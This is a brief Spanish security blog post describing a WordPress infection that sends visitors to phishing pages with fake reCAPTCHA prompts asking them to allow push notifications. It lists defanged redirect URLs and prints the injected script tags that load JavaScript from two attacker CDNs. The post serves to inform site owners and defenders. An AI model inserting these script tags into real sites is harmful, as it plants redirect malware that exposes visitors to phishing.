«The HoeflerText Font Wasn’t Found» Malware camuflado en alerta de fuente
agosto 15, 2018Abusan Vulnerabilidad en una versión antigua del plugin Duplicator
octubre 1, 2018Cada día los casos de infección en WordPress que redirecciona a los visitantes a páginas sospechosas está siendo algo muy común y preocupante. Recientemente, fue descubierta una vulnerabilidad en temas de tagDiv y Plugins de Ultimate Member. En este tipo hackeo WordPress, los visitantes de su página web son redirigidos a páginas phishing o maliciosas.
hxxp utroro.com/xyz or
hxxp://murieh.abc/xyz or
hxxps://unverf.com/xyz
En este hack, los usuarios, cuando se redirige, acaban en urls abusivas con imágenes reCAPTCHA suplantada (pishing). El texto intenta engañar a los visitantes para permitir notificaciones push del navegador.
Por otra parte, Google penaliza a los sitios web que estén en listas negras como sito web phising o hackeados. Los navegadores web mostrarán un mensaje de advertencia a los visitantes cuando visitan su web.
Código malicioso inyectados
El código inyectado en los ficheros php hace referencia a dos sitios
cdn.allyouwant.online. and cdn.eeduelements.com.
El primero fue usando en las últimas infecciones y el segundo desde el comienzo del uso de este tipo de ataque.
... <script type='text/javascript' src='hxxps://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>
<script type='text/javascript' src='hxxps://cdn.allyouwant.online/main.js?t=lp1'></script></head> ...
En el momento de escribir esta articulo, hay como unos 3900 sitios web con el script de cdn.eeduelements[.]com y más de 6800 con el script de cdn.allyouwant[.]online.